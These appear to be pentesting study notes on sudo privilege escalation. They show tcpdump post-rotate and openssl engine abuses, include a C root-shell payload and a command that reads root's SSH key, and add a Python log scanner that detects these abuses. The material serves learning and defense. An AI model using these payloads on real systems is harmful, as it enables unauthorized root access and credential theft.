Sudo Rights Abuse

  • check the current user's sudo privileges - sudo -l
  • only if our user is listed in the /etc/sudoers file can we run commands through sudo (normally after entering our own password; entries tagged NOPASSWD skip the prompt)
  • eg:
    • the user has (ALL) NOPASSWD: /usr/sbin/tcpdump permission
    • we create a shell script /tmp/.test that invokes a reverse shell
    • tcpdump's -z (postrotate-command) runs a program after every capture-file rotation and -Z sets the user it runs as; -W 1 -G 1 forces a rotation after one second, so the script fires almost immediately
    • sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root

Steps:

  • create /tmp/.test with a reverse shell
  • start a nc listener
  • run tcpdump as root
    • sudo /usr/sbin/tcpdump -ln -i ens192 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root

OPENSSL

This is the standard GTFOBins approach for getting a full interactive root shell: write a small piece of C code, compile it as a shared library, and tell OpenSSL to load it as an "engine".

Step 1: Create the C payload. On your attack machine (or on the target if it has gcc), create shell.c:

#include <unistd.h>
#include <stdlib.h>

/* The constructor attribute makes setup() run as soon as the shared object is
 * loaded into the (root-owned) openssl process, before any engine code is called. */
void __attribute__ ((constructor)) setup() {
    setuid(0);
    setgid(0);
    system("/bin/bash -p");
}

Step 2: Compile as a Shared Object (.so)

gcc -fPIC -shared -o shell.so shell.c -nostartfiles

Step 3: Execute via sudo. Transfer shell.so to the target and run:

sudo openssl engine -t -c "$(pwd)/shell.so"

Because openssl is running as root, the constructor in your library executes with root privileges, giving you a root shell.

OR SIMPLER (read a root-only file such as the root SSH key, no shell needed)

srvadm@dmz01:~$ LFILE=/root/.ssh/id_rsa
srvadm@dmz01:~$ sudo /usr/bin/openssl enc -in $LFILE
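Detection counterpart to the tcpdump and openssl abuses above, as an added example that is not part of the original notes: it parses sudo's syslog COMMAND= field and flags tcpdump post-rotate commands, openssl engine loads of a shared object, and openssl enc reads of root-only files. The log lines are constructed samples that reuse the host name and paths from the notes; the sensitive-path list is an assumption.

```python
import re
import shlex

# Constructed sample lines in sudo's syslog format (not captured from the host in the notes).
SAMPLE_LOG = """\
Mar  3 10:12:01 dmz01 sudo:  srvadm : TTY=pts/0 ; PWD=/home/srvadm ; USER=root ; COMMAND=/usr/sbin/tcpdump -ln -i ens192 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
Mar  3 10:14:22 dmz01 sudo:  srvadm : TTY=pts/0 ; PWD=/home/srvadm ; USER=root ; COMMAND=/usr/bin/openssl engine -t -c /home/srvadm/shell.so
Mar  3 10:15:40 dmz01 sudo:  srvadm : TTY=pts/0 ; PWD=/home/srvadm ; USER=root ; COMMAND=/usr/bin/openssl enc -in /root/.ssh/id_rsa
Mar  3 10:20:05 dmz01 sudo:  netops : TTY=pts/1 ; PWD=/home/netops ; USER=root ; COMMAND=/usr/sbin/tcpdump -ni eth0 -c 100 port 53
"""
COMMAND_RE = re.compile(r"sudo:\s+(?P<user>\S+) : .*?COMMAND=(?P<cmd>.*)$")
# Assumed list of files a sudo'd openssl should never read for an unprivileged user.
SENSITIVE_PREFIXES = ("/root/", "/etc/shadow", "/etc/sudoers")

def _arg_after(argv, flag):
    """Value following `flag`, or None if the flag is absent or has no value."""
    i = argv.index(flag) if flag in argv else -1
    return argv[i + 1] if 0 <= i < len(argv) - 1 else None

def classify(argv):
    """Return a finding for one sudo COMMAND argv, or None if it looks benign."""
    if not argv:
        return None
    prog = argv[0].rsplit("/", 1)[-1]
    if prog == "tcpdump":
        # -z runs a post-rotate command after each rotation; -Z picks the user it runs as.
        cmd = _arg_after(argv, "-z")
        if cmd:
            return f"tcpdump post-rotate command {cmd!r} as {_arg_after(argv, '-Z') or 'default user'}"
    elif prog == "openssl" and len(argv) > 1:
        if argv[1] == "engine":
            # A path argument means an arbitrary shared object is loaded into the root process.
            paths = [a for a in argv[2:] if "/" in a]
            if paths:
                return f"openssl engine loading shared object {paths[0]!r}"
        elif argv[1] == "enc":
            src = _arg_after(argv, "-in")
            if src and src.startswith(SENSITIVE_PREFIXES):
                return f"openssl enc reading sensitive file {src!r}"
    return None

def scan(log_text):
    """Return [(user, finding)] for every sudo line that trips a rule."""
    findings = []
    for line in log_text.splitlines():
        m = COMMAND_RE.search(line)
        if m and (finding := classify(shlex.split(m.group("cmd")))):
            findings.append((m.group("user"), finding))
    return findings
```

Running scan(SAMPLE_LOG) flags the three srvadm lines and leaves the ordinary netops capture alone; point it at /var/log/auth.log (or journalctl output) for live use.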

Prevention